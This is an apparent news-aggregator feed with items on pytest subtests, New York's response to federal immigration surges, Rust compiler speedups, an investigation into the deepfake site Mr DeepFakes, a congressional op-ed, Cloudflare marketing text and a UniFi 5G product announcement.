Becomes this using subtests instead:

def test_settings_are_documented(settings_headings, subtests):
    for setting in app.SETTINGS:
        with subtests.test(setting=setting.name):
            assert setting.name in settings_headings

Why is this better? Two reasons:

  1. It appears to run a bit faster
  2. Subtests can be created programmatically after running some setup code first (see the sketch below)
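
Here's a small, self-contained sketch of that second point (my example, not from the post), assuming pytest 9.0.0+ where the subtests fixture is built in:

def test_runtime_discovered_settings_are_documented(subtests):
    # The cases are computed at *run* time, after setup code executes;
    # @pytest.mark.parametrize, resolved at collection time, can't
    # easily express this.
    documented = {"log_level", "cache_dir"}            # stand-in setup data
    discovered = sorted(documented | {"new_setting"})  # produced by "setup"
    for name in discovered:
        with subtests.test(setting=name):
            assert name in documented  # "new_setting" fails as its own subtest

Each failing name is reported as its own subtest rather than aborting the whole test at the first assertion.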

I had Claude Code port several tests to the new pattern. I like it.

When To Accommodate, and When To Fight? NY Officials Agonize and Prepare for Federal Escalation

Portside
portside.org
2025-12-05 05:37:41
When To Accommodate, and When To Fight? NY Officials Agonize and Prepare for Federal Escalation jay Fri, 12/05/2025 - 00:37 ...
Original Article

Jackie Bray has been thinking about how quickly things could spiral out of control.

Bray is the New York state emergency leader whom Gov. Kathy Hochul tasked with averting a Chicago or Los Angeles-style surge of immigration agents and National Guard troops. At the core of the job is a dilemma that the Trump administration has imposed on blue cities and states around the country: How can the state respond to aggressive, spectacle-driven immigration operations without triggering the showdown with federal agents that the administration is trying to provoke?

The problem is made only more acute by how some of the operations have been geared toward gaining as much attention as possible, and by their drift away from immigration enforcement and toward repressing the protests that arise in response.

The result, state officials say, is a split approach. New York will fight to delay and block any federal deployment of the National Guard. But when it comes to surges of immigration enforcement officers, the plan is restraint: state and local police will act as buffers between federal agents and protestors, doing what they can to control crowds and de-escalate.

Glimpses of that strategy have already started to emerge. NYPD Commissioner Jessica Tisch reportedly got a heads-up about a high-profile October immigration raid on Manhattan’s Canal Street from the Trump administration; the Daily News reported that she directed officers to steer clear of the area. At a protest in late November, local police placed barricades between demonstrators and a group of Immigration and Customs Enforcement and Border Patrol officers who the activists had surrounded in a parking garage.

The approach has already led to criticism that the state is accommodating, and not fighting, what many regard as an increasingly harrowing example of authoritarianism. State officials respond that their approach is necessary to stop events from spiraling into the kind of escalation that could justify more federal deployments.

“I feel very lucky to not be an elected leader right now,” Bray told TPM.

Outreach

Gov. Kathy Hochul (D) directed Bray, a political appointee serving as director of the New York State Division of Homeland Security and Emergency Services, over the summer to work out a plan that would avert the kind of splashy, violent federal presence that overtook Chicago, Los Angeles, and other cities.

For prevention, one model stands out: San Francisco.

There, Silicon Valley executives, along with Mayor Daniel Lurie (D), pleaded with Trump. They argued that a deployment would damage the economy. He replied by calling it off: “Friends of mine who live in the area called last night to ask me not to go forward with the surge,” he wrote on Truth Social.

That’s the plan that New York officials are trying to implement. They’ve convened groups of Wall Street leaders (Bray declined to say whether any had spoken to White House officials); both Hochul and New York City mayor-elect Zohran Mamdani have spoken with Trump directly.

Those meetings have resulted in something less than an adversarial relationship. As Trump shepherded Mamdani through an Oval Office press conference last month, the mayor-elect emphasized areas where the city and federal government could work together.

There are other benefits that the state can provide Trump, whose family business is still deeply rooted in New York. This week, a state gambling board approved licenses for three proposed casinos: one of them is set to be built on a golf course that belonged to the President. The move will net the Trump Organization $115 million.

Chicago and LA warnings

The deployments in Chicago and Los Angeles brought a level of brutality that, at first, helped to obscure their real aim.

The Trump administration cast them as immigration enforcement efforts, albeit with a new level of aggression. But after the White House used local, minor incidents of violence to justify sending troops in, the ICE and CBP operations started to strike observers as pretexts to stage larger-scale repression.

That prompted organizing between cities and states that had experienced the deployments and those that were next. New York’s Communications Workers of America organized one call in September titled “Learning From Chicago and LA and Preparing for Federal Escalation,” between elected officials in New York, Illinois, California, and elsewhere.

“We were just cautioning people to not lose the messaging war,” Hugo Martinez, a Los Angeles city councilmember on the call, told TPM. He said that the administration was seeking grounds to escalate, and that community leaders needed to “try to have as much control as possible over the response that the community has.”

Byron Sigcho-Lopez, a Chicago alderman, was on the call as well.

He took the message to heart. His community, Chicago’s Little Village, became an epicenter of CBP operations. One video that Sigcho-Lopez recorded of an October encounter with Border Patrol commander Gregory Bovino demonstrates how he internalized the approach: at several points, when demonstrators started to approach federal agents, Sigcho-Lopez would wave them off.

“They wanted to see escalation,” he told TPM last month.

Bray, the New York state commissioner, said that she had spoken to her counterparts in California and Illinois. For her, a few points became clear: litigation needed to start early. Local law enforcement needed to be prepared for the administration to direct federal authorities to stop communicating with them. Certain sites — like ICE detention facilities — became flashpoints.

Averted, but for how long?

The charm offensive has worked for now, state and city officials told TPM. But nobody can say how long that will last.

City officials are already taking some steps to prepare. The city sold a still-functional but out-of-use prison barge that was anchored near Rikers Island to a scrap company in Louisiana, removing 800 beds that the federal government could have seized for immigration enforcement. The city’s Economic Development Corporation, which is responsible for the project, declined to comment.

New York Attorney General Tish James’ office is preparing legal strategies and lawsuits to file that would challenge any National Guard deployment, one official told TPM.

Community organizers — some of whom have held calls with their counterparts in Chicago, LA, and elsewhere — are preparing as well.

They envision a campaign of resistance that will start with measures already in place, like flyers calling for people to report ICE and CBP operations. That information is then relayed to a network of people who can mobilize in response, organizing through messaging apps and staging spontaneous protests like one that appeared in Manhattan over the weekend and corralled federal agents for roughly two hours.

On the less risky end, that can mean mutual aid programs to provide legal and other forms of support. But some organizers also want to see more disruption. Jasmine Gripper, a state director of the Working Families Party, was on the call with local officials from LA and Chicago. Gripper told TPM that she envisioned a series of tactics that she described as “not letting ICE be at peace in our city.” That means persuading restaurant owners to refuse to serve immigration agents, following agents around with large bullhorns announcing their presence, and finding out where they’re staying and making loud noises at night.

“How do we disrupt at every level and have peaceful resistance and noncompliance to ICE being in our communities and what best can keep our folks safe?” she said.

Bray, the New York State emergency and homeland security commissioner, told TPM that she’s devoting around half of her schedule to trying to avert a federal escalation and to planning for one if it does happen.

The aggression in federal operations in Chicago shocked her, she said. Federal agents walked around in fatigues, unidentified while wearing masks, as if they were an occupying foreign power. In one incident in Chicago, law enforcement rappelled from a helicopter into a dilapidated apartment building for a showy immigration raid.

“Why? Tell me what the strategic, tactical, operational requirement for that is?” Bray asked.

It’s illegal to block federal agents from doing their job, Bray said. The overriding risk is that things spiral out of control. In California, federal law enforcement cut off communication with local cops as operations there ramped up. Bray told TPM that the state will do what it can to make sure that those lines of communication stay open, even when that means having police prevent demonstrators from blocking federal agents.

“You get images where people will say to me, ‘well, wait a second, look, isn’t that the NYPD helping?’ No, they’re not helping,” Bray said. “They’re doing crowd control. They’re making sure that there aren’t violent clashes in front of a government building. That’s their job. That’s not cooperation with feds. But, you know, this is gonna test us all.”

[Josh Kovensky is an investigative reporter for Talking Points Memo, based in New York. He previously worked for the Kyiv Post in Ukraine, covering politics, business, and corruption there.]

How to speed up the Rust compiler in December 2025

Lobsters
nnethercote.github.io
2025-12-05 05:12:20
Comments...
Original Article

It has been more than six months since my last post on the Rust compiler’s performance. In that time I lost one job and gained another. I have less time to work directly on the Rust compiler than I used to, but I am still doing some stuff, while also working on other interesting things.

Compiler improvements

#142095: The compiler has a data structure called VecCache which is a key-value store used with keys that are densely-numbered IDs, such as CrateNum or LocalDefId. It’s a segmented vector with increasingly large buckets added as it grows. In this PR Josh Triplett optimized the common case when the key is in the first segment, which holds 4096 entries. This gave icount reductions across many benchmark runs, beyond 4% in the best cases.
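
As a rough illustration of that layout, here is a Python analogue (not the compiler's actual Rust; the doubling growth policy is an assumption, only the 4096-entry first segment comes from the PR):

class SegmentedCache:
    # A VecCache-like key-value store for densely-numbered integer IDs.
    # Keys below 4096 take a direct index into the first segment, the
    # common case optimized in #142095; larger keys walk later segments.
    FIRST_SEGMENT = 4096

    def __init__(self):
        self.first = [None] * self.FIRST_SEGMENT  # fast-path segment
        self.rest = []  # later segments of growing size

    def get(self, key: int):
        if key < self.FIRST_SEGMENT:  # fast path: one compare + one index
            return self.first[key]
        index, size = key - self.FIRST_SEGMENT, self.FIRST_SEGMENT
        for segment in self.rest:     # slow path: locate the right segment
            if index < size:
                return segment[index]
            index -= size
            size *= 2
        return None

    def insert(self, key: int, value) -> None:
        if key < self.FIRST_SEGMENT:
            self.first[key] = value
            return
        index, size = key - self.FIRST_SEGMENT, self.FIRST_SEGMENT
        for segment in self.rest:
            if index < size:
                segment[index] = value
                return
            index -= size
            size *= 2
        while True:  # grow, doubling segment sizes, until the key fits
            segment = [None] * size
            self.rest.append(segment)
            if index < size:
                segment[index] = value
                return
            index -= size
            size *= 2

The point of the first-segment check is that small IDs dominate, so most lookups pay one comparison and one index instead of a segment walk.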

#148040: In this PR Ben Kimock added a fast path for lowering trivial consts. This reduced compile times for the libc crate by 5-15%! It’s unusual to see a change that affects a single real-world crate so much, across all compilation scenarios: debug and release, incremental and non-incremental. This is a great result. At the time of writing, libc is the #12 most popular crate on crates.io as measured by “recent downloads”, and #7 as measured by “all-time downloads”. This change also reduced icounts for a few other benchmarks by up to 10%.

#147293: In the query system there was a value computed on a hot path that was only used within a debug! call. In this PR I avoided doing that computation unless necessary, which gave icount reductions across many benchmark results, more than 3% in the best case. This was such a classic micro-optimization that I added it as an example to the Logging and Debugging chapter of The Rust Performance Book.
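
The pattern, transposed from rustc's debug! macro into Python's logging module purely for illustration (all names here are invented):

import logging

logger = logging.getLogger(__name__)

def expensive_summary(items) -> str:
    # Stand-in for the costly value that was being computed unconditionally.
    return ", ".join(sorted(str(item) for item in items))

def hot_path(items):
    # Only build the summary when debug logging is actually enabled;
    # previously the equivalent value was computed on every call even
    # though it was used solely inside a debug log statement.
    if logger.isEnabledFor(logging.DEBUG):
        logger.debug("processing: %s", expensive_summary(items))
    return len(items)  # placeholder for the hot path's real work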

#148706: In this PR dianne optimized the handling of temporary scopes. This reduced icounts on a number of benchmarks, 3% in the best case. It also reduced peak memory usage on some of the secondary benchmarks containing very large literals, by 5% in the best cases.

#143684: In this PR Nikita Popov upgraded the LLVM version used by the compiler to LLVM 21. In recent years every LLVM update has improved the speed of the Rust compiler. In this case the mean icount reduction across all benchmark results was an excellent 1.70%, and the mean cycle count reduction was 0.90%, but the mean wall-time saw an increase of 0.26%. Wall-time is the true metric, because it’s what users perceive, though it has high variance. icounts and cycles usually correlate well with wall-time, especially on large changes like this that affect many benchmarks, though this case is a counter-example. I’m not quite sure what to make of it; I don’t know whether the wall-time results on the test machine are representative.

#148789: In this PR Mara Bos reimplemented format_args!() and fmt::Arguments to be more space-efficient. This gave lots of small icount wins, and a couple of enormous (30-38%) wins for the large-workspace stress test. Mara wrote about this on Mastodon. She has also written about prior work on formatting on her blog and in this tracking issue. Lots of great reading there for people who love nitty-gritty optimization details, including nice diagrams of how data structures are laid out in memory.

Proc macro wins in Bevy

In June I added a new compiler flag -Zmacro-stats that measures how much code is generated by macros. I wrote previously about how I used it to optimize #[derive(Arbitrary)] from the arbitrary crate used for fuzzing.

I also used it to streamline the code generated by #[derive(Reflect)] in Bevy. This derive is used to implement reflection on many types and it produced a lot of code. For example, the bevy_ui crate was around 16,000 lines and 563,000 bytes of source code. The code generated by #[derive(Reflect)] for types within that crate was around 27,000 lines and 1,544,000 bytes. Macro expansion almost quadrupled the size of the code, mostly because of this one macro!

The code generated by #[derive(Reflect)] had a lot of redundancies. I made PRs to remove unnecessary calls, duplicate type bounds (and a follow-up), const _ blocks, closures, arguments, trait bounds, attributes, impls, and finally I factored out some repetition.

After doing this I measured the bevy_window crate. The size of the code generated by #[derive(Reflect)] was reduced by 39%, which reduced cargo check wall-time for that crate by 16%, and peak memory usage by 5%. And there are likely similar improvements across many other crates within Bevy, as well as programs that use #[derive(Reflect)] themselves.

It’s understandable that the generated code was suboptimal. Proc macros aren’t easy to write; there was previously no easy way to measure the size of the generated code; and the generated code was considered good enough because (a) it worked, and (b) the compiler would effectively optimize away all the redundancies. But in general it is more efficient to optimize away redundancies at the generation point, where context-specific and domain-specific information is available, rather than relying on sophisticated optimization machinery further down the compilation pipeline that has to reconstruct information. And it’s just less code to parse and represent in memory.
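
To make that concrete, here is an invented before-and-after in the same spirit (duplicate bounds and a needless closure); it is not Bevy’s actual #[derive(Reflect)] expansion, just the flavor of redundancy a derive can emit.

struct Before<T>(T);
struct After<T>(T);

// Before: a duplicated trait bound and a closure wrapping a plain
// expression. The optimizer sees through both, but the compiler
// still has to parse, expand, and type-check the extra code.
impl<T: Clone + Send + Clone> Before<T> {
    fn type_name(&self) -> &'static str {
        (|| "Before")()
    }
}

// After: the same behavior with the redundancy removed at the
// generation point.
impl<T: Clone + Send> After<T> {
    fn type_name(&self) -> &'static str {
        "After"
    }
}

fn main() {
    println!("{} {}", Before(1).type_name(), After(1).type_name());
}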

rustdoc-json

At RustWeek 2025 I had a conversation with Predrag Gruevski about rustdoc-json (invoked with the --output-format=json flag) and its effects on the performance of cargo-semver-checks. I spent some time looking into it and found one nice win.

#142335: In this PR I reduced the number of allocations done by rustdoc-json. This gave wall-time reductions of up to 10% and peak memory usage reductions of up to 8%.

I also tried various other things to improve rustdoc-json’s speed, without much success. JSON is simple and easy to parse, and rustdoc-json’s schema for representing Rust code is easy for humans to read. These qualities are great for newcomers and people who want to experiment, but they also make the JSON output space-inefficient, which limits the performance of heavy-duty tools like cargo-semver-checks that are designed for large codebases. There are some obvious space optimizations that could be applied to the JSON schema, like shortening field names, omitting fields with default values, and interning repeated strings. But these all affect its readability and flexibility.
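
As a sketch of what such optimizations look like (with invented types, not rustdoc-json’s actual schema), here is how serde can shorten field names and omit common defaults, at a clear cost to human readability:

use serde::Serialize;

// Readable: every item repeats long field names and common values.
#[derive(Serialize)]
struct ItemReadable {
    name: String,
    visibility: String, // "public" for the vast majority of items
    docs: Option<String>,
}

// Compact: shorter names, defaults omitted. Smaller output, but
// harder for humans to read and more brittle to evolve.
#[derive(Serialize)]
struct ItemCompact {
    #[serde(rename = "n")]
    name: String,
    #[serde(rename = "v", skip_serializing_if = "is_public")]
    visibility: String,
    #[serde(rename = "d", skip_serializing_if = "Option::is_none")]
    docs: Option<String>,
}

fn is_public(v: &String) -> bool {
    v == "public"
}

fn main() {
    let item = ItemCompact {
        name: "foo".into(),
        visibility: "public".into(),
        docs: None,
    };
    // Prints {"n":"foo"}: the common-case fields disappear entirely.
    println!("{}", serde_json::to_string(&item).unwrap());
}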

The right solution here is probably to introduce a performance-oriented second format for the heavy-duty users. #142642 is a draft attempt at this. Hopefully progress can be made here in the future.

Faster compilation of large API crates

Josh Triplett introduced a new experimental flag, -Zhint-mostly-unused, which can give big compile-time wins for people using small fractions of very large crates. This is typically the case for certain large API crates, such as windows, rustix, and aws-sdk-ec2. Read about it here.

Faster Rust builds on Mac

Did you know that macOS has a secret setting that can make Rust builds faster? No joke!

General progress

Progress since May must be split into two parts, because in July we changed the machine on which the measurements are done.

The first period (2025-05-20 to 2025-06-30) was on the old machine. The second period (2025-07-01 to 2025-12-03) was on the new machine.

The mean wall-time changes were moderate improvements (-3.19% and -2.65%). The mean peak memory usage changes were a wash (+1.18% and -1.50%). The mean binary size changes were small increases (0.45% and 2.56%).

It’s good that wall-times went down overall, even if the other metrics were mixed. There is a slow but steady stream of bug fixes and new features to the compiler, which often hurt performance. In the absence of active performance work the natural tendency for a compiler is to get slower, so I view even small improvements as a win.

The new machine reduced wall-times by about 20%. It’s worth upgrading your hardware, if you can!

‘It was about degrading someone completely’: the story of Mr DeepFakes – the world’s most notorious AI porn site

Guardian
www.theguardian.com
2025-12-05 05:00:42
The hobbyists who helped build this site created technology that has been used to humiliate countless women. Why didn’t governments step in and stop them? For Patrizia Schlosser, it started with an apologetic call from a colleague. “I’m sorry but I found this. Are you aware of it?” He sent over a li...
Original Article

For Patrizia Schlosser, it started with an apologetic call from a colleague. “I’m sorry but I found this. Are you aware of it?” He sent over a link, which took her to a site called Mr DeepFakes. There, she found fake images of herself, naked, squatting, chained, performing sex acts with various animals. They were tagged “Patrizia Schlosser sluty FUNK whore” (sic).

“They were very graphic, very humiliating,” says Schlosser, a German journalist for Norddeutscher Rundfunk (NDR) and Funk . “They were also very badly done, which made it easier to distance myself, and tell myself they were obviously fake. But it was very disturbing to imagine somebody somewhere spending hours on the internet searching for pictures of me, putting all this together.”

The site was new to Schlosser, despite her previous high-profile investigations into the porn industry. “I’d never heard of Mr DeepFakes – a porn site entirely dedicated to fake porn videos and photos. I was surprised by how big it was – so many videos of every celebrity you know.” Schlosser’s first reaction on seeing herself among them was to brush it aside. “I tried to push it to the back of my mind, which was really a strategy of not dealing with it,” she says. “But it’s strange how the brain works. You know it’s fake but still you see it. It’s not you but also it is you. There you are with a dog and a chain. You feel violated but confused. At some point, I decided: ‘No. I’m angry. I don’t want those images out there.’”

Schlosser’s subsequent documentary for NDR’s STRG_F programme did succeed in getting the images removed. She also tracked down the young man who had created and posted them – even visiting his home and speaking to his mother. (The perpetrator himself wouldn’t come out of his bedroom.) However, Schlosser was unable to identify “Mr DeepFakes” – or whoever was behind the site, despite enlisting the help of Bellingcat, the online investigative journalism collective. Bellingcat’s Ross Higgins was on the team. “My background is investigating money laundering,” he says. “I looked at the structure of the website and it was using the same internet service providers (ISPs) as proper serious organised criminals.” The ISPs suggested links to the Russian mercenary group Wagner, and individuals named in the Panama Papers . The ads it carried included ones for apps owned by Chinese technology companies, which allowed China’s government access to all customer data. “I made the presumption that this was all much too sophisticated to be a site of hobbyists,” says Higgins.

It turned out that’s exactly what it was.

The story of Mr DeepFakes, the world’s largest, most notorious nonconsensual deepfake porn site, is really the story of AI porn itself – the very term “deepfake” is believed to have come from its originator. A “ground zero” for AI-generated pornography, its pages – which have been viewed more than 2bn times – have depicted countless female celebrities, politicians, European princesses, wives and daughters of US presidents, being kidnapped, tortured, shaved, bound, mutilated, raped and strangled. Yet all this content (which would take more than 200 days to watch) was just the site’s “shop window”. Its true heart, its “engine room”, was its forum. Here, anyone wanting deepfakes created of someone they knew (a girlfriend, sister, classmate or colleague) could find someone willing to make them to order for the right price. It was also a “training ground”, a technical hub where “hobbyists” taught one another, shared tips, posted academic papers and “problem-solved”. (One recurring problem was how to deepfake without a good “dataset” – that is, how to deepfake someone you don’t have many pictures of, so not a celebrity, but maybe someone you know whose social media you’ve screengrabbed.)

The film-maker and activist Sophie Compton spent many hours monitoring Mr DeepFakes while researching the award-winning 2023 documentary Another Body (available on iPlayer). “Looking back, I think that site played such an instrumental role in the proliferation of deepfakes overall,” she says. “I really think that there’s a world in which the site didn’t get made, wasn’t allowed to be made or was shut down quickly, and deepfake porn is just a fraction of the issue that we have today. Without that site, I don’t think it would have exploded in the way it did.”

In fact, that scenario was entirely possible. The origins of Mr DeepFakes stretch back to 2017-18 when AI porn was just beginning to build on social media sites such as Reddit. One anonymous Redditor and AI porn “pioneer” who went by the name of “deepfakes” (and is thus credited with coining the term) gave an early interview to Vice about its potential. Shortly after, though, in early 2018, Reddit banned deepfake porn from its site. “We have screenshots from their message boards at that time and the deepfake community, which was small, was freaking out and jumping ship,” says Compton. This is when Mr DeepFakes was created, with the early domain name dpfks.com. The administrator carried the same username – dpfks – and was the person who advertised for volunteers to work as moderators, and posted rules and guidelines, as well as deepfake videos and an in-depth guide to using software for deepfake porn.

“What’s so depressing about reading the messages and seeing the genesis is realising how easily governments could have stopped this in its tracks,” says Compton. “The people doing it didn’t believe they were going to be allowed free rein. They were saying: ‘They’re coming for us!’, ‘They’re never going to let us do this!’ But as they continued without any problems at all, you see this growing emboldenment. Covid added to the explosion as everyone stopped moderating content. The output was violent – it was about degrading someone completely. The celebrities that were really popular were often really young – Emma Watson, Billie Eilish, Millie Bobby Brown.” (Greta Thunberg is another example here.)

Who was behind it? From time to time, Mr DeepFakes gave anonymous interviews. In a 2022 BBC documentary, Deepfake Porn: Could You Be Next?, the site’s “owner” and “web developer”, going by the pseudonym “deepfakes”, made the argument that consent from the women wasn’t required as “it’s a fantasy, it’s not real”.

Was money their motivation? Mr DeepFakes ran ads and had a premium membership paid in cryptocurrency – in 2020, one forum post mentioned that it made between $4,000 and $7,000 a month. “There was a commercial aspect,” says Higgins. “It was a side hustle, but it was more than that. It gave this notoriety.”

At one point, the site “posted 6,000 pictures of AOC’s [the US politician Alexandria Ocasio-Cortez’s] face in order that people could make deepfake pornography of her,” says Higgins. “It’s insane. [There were] all these files of YouTubers and politicians. What it’s saying is that if you’re a woman in this world you can only achieve so much because if you put your head above the parapet, if you have the temerity to do anything publicly, you can expect your image to be used in the most degrading way possible for personal profit.

“The most affecting thing for me was the language used about women on that site,” he continues. “We had to change it for our online report because we didn’t want it to be triggering, but this is pure misogyny. Pure hatred.”

This April, investigators began to believe that they had found Mr DeepFakes and sent emails to their suspect.

On 4 May, Mr DeepFakes shut down. A notice on its homepage blamed “data loss” caused by the withdrawal of a “critical service provider”. “We will not be relaunching,” it continued. “Any website claiming this is fake. This domain will eventually expire and we are not responsible for future use. This message will be removed in about a week.”

Mr DeepFakes is finished – but according to Compton, this could have happened so much sooner. “All the signs were there,” she says. The previous year, in April 2024, when the UK government announced plans to criminalise the creation and sharing of deepfake sexual abuse material , Mr DeepFakes responded by immediately blocking access to UK users. (The plans were later shelved when the 2024 election was called.) “It showed that ‘Mr DeepFakes’ was obviously not so committed that there was nothing governments could do,” says Compton. “If it was going to become too much of a pain and a risk to run the site, then they weren’t going to bother.”

But deepfake porn has become so popular, so mainstream, that it no longer requires a “base camp”. “The things that those guys prided themselves on learning how to do and teaching others are now so embedded, they’re accessible to anyone on apps at the click of the button,” says Compton.

And for those wanting something more complex, the creators, the self-styled experts who once lurked on its forum, are now out there touting for business. Patrizia Schlosser knows this for sure. “As part of my research, I went undercover and reached out to some of the people on the forums, asking for a deepfake of an ex-girlfriend,” says Schlosser. “Although it’s often claimed the site was only about celebrities, that wasn’t true. The response was, ‘Yeah, sure …’

“After Mr DeepFakes shut down, I got an automatic email from one of them which said: “If you want anything made, let me know … Mr DeepFakes is down – but of course, we keep working.”

In the UK and Ireland, Samaritans can be contacted on freephone 116 123, or email jo@samaritans.org or jo@samaritans.ie. In the US, you can call or text the 988 Suicide & Crisis Lifeline at 988 or chat at 988lifeline.org . In Australia, the crisis support service Lifeline is 13 11 14. Other international helplines can be found at befrienders.org

In the UK, Rape Crisis offers support for rape and sexual abuse on 0808 802 9999 in England and Wales, 0808 801 0302 in Scotland , or 0800 0246 991 in Northern Ireland . In the US, Rainn offers support on 800-656-4673. In Australia, support is available at 1800Respect (1800 737 732). Other international helplines can be found at ibiblio.org/rcip/internl.html

Trump Knows He’s Failing. Cue the Bigotry.

Portside
portside.org
2025-12-05 04:39:41
Trump Knows He’s Failing. Cue the Bigotry. jay Thu, 12/04/2025 - 23:39 ...
Original Article

Photo credit: Farah Abdi Warsameh/Associated Press // New York Times

On Tuesday, President Trump called my friends and me “garbage.”

This comment was only the latest in a series of remarks and Truth Social posts in which the president has demonized and spread conspiracy theories about the Somali community and about me personally. For years, the president has spewed hate speech in an effort to gin up contempt against me. He reaches for the same playbook of racism, xenophobia, Islamophobia and division again and again. At one 2019 rally, he egged on his crowd until it chanted “send her back” when he said my name.

Mr. Trump denigrates not only Somalis but so many other immigrants, too, particularly those who are Black and Muslim. While he has consistently tried to vilify newcomers, we will not let him silence us. He fails to realize how deeply Somali Americans love this country. We are doctors, teachers, police officers and elected leaders working to make our country better. Over 90 percent of Somalis living in my home state, Minnesota, are American citizens by birth or naturalization. Some even supported Mr. Trump at the ballot box.

“I don’t want them in our country,” the president said this week. “Let them go back to where they came from.”

Somali Americans remain resilient against the onslaught of attacks from the White House. But I am deeply worried about the ramifications of these tirades. When Mr. Trump maligns me, it increases the number of death threats that my family, staff members and I receive. As a member of Congress, I am privileged to have access to security when these threats arise. What keeps me up at night is that people who share the identities I hold — Black, Somali, hijabi, immigrant — will suffer the consequences of his words, which so often go unchecked by members of the Republican Party and other elected officials. All Americans have a duty to call out this hateful rhetoric when we hear it.

The president’s dehumanizing and dangerous attacks on minority immigrant communities are nothing new. When he first ran for president a decade ago, he launched his campaign with claims that he was going to pause Muslim immigration to this country. He has since falsely accused Haitian migrants of eating pets and referred to Haiti and African nations as “shithole” countries. He has accused Mexico of sending rapists and drug peddlers across our border. It is unconscionable that he fails to acknowledge how this country was built on the backs of immigrants and mocks their ongoing contributions.

While the president wastes his time attacking my community, my state, my governor and me, the promises of economic prosperity he made in his run for president last year have not come to fruition. Prices have not come down; in many cases, they have risen. His implementation of tariffs has hurt farmers and small business owners. His policies have only worsened the affordability crisis for Americans. And now, with Affordable Care Act tax credits set to expire, health care costs for American households are primed to skyrocket, and millions of people risk losing their coverage under his signature domestic policy bill.

The president knows he is failing, and so he is reverting to what he knows best: trying to divert attention by stoking bigotry.

When I was sworn into Congress in 2019, my father turned to me and expressed bewilderment that the leader of the free world was picking on a freshman member of Congress, one out of 535 members of the legislative body. The president’s goal may have been to try to tear me down, but my community and my constituents rallied behind me then, just as they are now.

I often say that although Minnesota may be cold, the people here have warm hearts. Minnesota is special. That is why when so many Somalis arrived in this country, they chose the state as home. I am deeply grateful to the people of Minnesota for the generosity, hospitality and support they have shown to every immigrant community in our state.

We will not let Mr. Trump intimidate or debilitate us. We are not afraid. After all, Minnesotans not only welcome refugees, they also sent one to Congress.

Thoughts on Go vs. Rust vs. Zig

Simon Willison
simonwillison.net
2025-12-05 04:28:05
Thoughts on Go vs. Rust vs. Zig Thoughtful commentary on Go, Rust, and Zig by Sinclair Target. I haven't seen a single comparison that covers all three before and I learned a lot from reading this. One thing that I hadn't noticed before is that none of these three languages implement class-based OOP...
Original Article

Thoughts on Go vs. Rust vs. Zig (via) Thoughtful commentary on Go, Rust, and Zig by Sinclair Target. I haven't seen a single comparison that covers all three before and I learned a lot from reading this.

One thing that I hadn't noticed before is that none of these three languages implement class-based OOP.

Posted 5th December 2025 at 4:28 am

Cloudflare is down

Hacker News
www.cloudflare.com
2025-12-05 08:50:16
Comments...
Original Article

Our connectivity cloud is the best place to
  • connect your users, apps, clouds, and networks
  • protect everything you connect to the Internet
  • build and scale applications

Over 60 cloud services on one unified platform, uniquely powered by a global cloud network. We call it the connectivity cloud.

Connect your people, apps and AI agents

Modernize your network and secure your workspace against unauthorized access, web browsing attacks and phishing. Accelerate your journey to Zero Trust with our SASE platform today.

Speak to sales about SASE to modernize your network and secure your workspace.



Protect and accelerate websites and AI-enabled apps

Use our industry-leading WAF, DDoS, and bot protection to protect your websites, apps, APIs, and AI workloads while accelerating performance with our ultra-fast CDN. Get started in 5 minutes.


Build and secure AI agents

Agents are the future of AI, and Cloudflare is the best place to get started. Use our agents framework and orchestration tools to run the models you choose and deliver new agents quickly. Build, deploy, and secure access for remote MCP servers so agents can access the features of your apps.


One global cloud network unlike any other

Only Cloudflare offers an intelligent, global cloud network built from the ground up for security, speed, and reliability.

  • 60+ cloud services available globally
  • 234B cyber threats blocked each day
  • 20% of all websites are protected by Cloudflare
  • 330+ cities in 125+ countries, including mainland China

Cloudflare Stats

Leading companies rely on Cloudflare


How Cloudflare can help

  • Accelerate website performance
  • Block bot traffic: stop bot attacks in real time by harnessing data from millions of websites protected by Cloudflare.
  • Optimize video experiences
  • Deploy serverless code: build serverless applications and deploy instantly across the globe for speed, reliability, and scale.
  • Deploy AI on the edge
  • Eliminate egress fees for object storage


Get started with the connectivity cloud


Get started for free

Get easy, instant access to Cloudflare security and performance services.

Start for free

Need help choosing?

Get a personalized product recommendation for your specific needs.

Find the right plan

Talk to an expert

Have questions or want to get a demo? Get in touch with one of our experts.

Contact us

UniFi 5G

Hacker News
blog.ui.com
2025-12-05 07:06:38
Comments...
Original Article


4 December 2025

Tom Hildebrand

The UniFi 5G Max lineup was created with a clear goal in mind: deliver a sleek, versatile, and exceptionally powerful 5G internet experience that works effortlessly in any environment.

UniFi 5G Max: Simple Setup and Clean Design

The UniFi 5G Max makes deployment easy, whether installed locally or at a remote site. Plug it into any PoE port and it instantly appears as a ready-to-use WAN interface, whether it's connected directly to your UniFi gateway or to your office switch. No new cable runs needed! It sits neatly on a desk, but you can reposition it for the best possible signal using the included wall or window mount.

  • Automatic adoption as a UniFi WAN interface on any PoE port.
  • Compact indoor design with a handy LCM
  • Desk, wall, or window mounting options
  • Optimize signal reception by repositioning anywhere on the network.
  • Ideal for home, office, or remote site use.

A compact form factor designed for fast installation and flexible placement at the core or edge.

Ultra-Flexible Connectivity for Any Network Role

The 5G Max delivers downlink speeds up to 2 Gbps with ultra-low latency, making it reliable as a primary connection and seamless as a backup WAN. UniFi routing policies and SLAs let you choose exactly how and when 5G is used, and for which clients and VLANs. Easily set per-SIM usage limits to avoid overage costs with just a few clicks.

  • Up to 2 Gbps downlink
  • Ultra low latency on supported networks
  • Works as primary, load-balanced, or failover WAN
  • Customizable policy based routing
  • SLA driven control through UniFi

High speed 5G that adapts to your network's rules, not the other way around.

UniFi 5G Max Outdoor: Rugged Speed and Extended Reach

For tougher environments or deployments with poor indoor cellular coverage, the outdoor model maintains the same high-performance cellular connectivity with improved antenna performance in a durable IP67-rated enclosure. It is built for rooftop installs, off-site locations, and mobile deployments where reliability is critical. Just like its indoor counterpart, you can connect it via any PoE port, anywhere on your network, greatly simplifying cabling requirements.

  • Enhanced long range antenna design
  • IP67 weather resistant construction
  • Built for rooftops, remote sites, and vehicle based setups
  • Stable performance in harsh conditions

A weatherproof 5G device built for reliability wherever you place it.

Dream Router 5G Max: The Fully Integrated UniFi Experience

If you want everything UniFi in one device, the Dream Router 5G Max combines 5G connectivity with WiFi 7, local storage, and full UniFi OS application support. Deploy it anywhere 5G is available and run an entire high-performance, scalable network stack instantly.

  • Integrated tri-band WiFi 7
  • Local storage via MicroSD for UniFi apps
  • Full UniFi OS environment
  • Complete routing and management in one device
  • Perfect for remote offices and flexible deployments

A complete UniFi system powered by the reach and speed of 5G.

Fully Unlocked for Maximum Carrier Flexibility

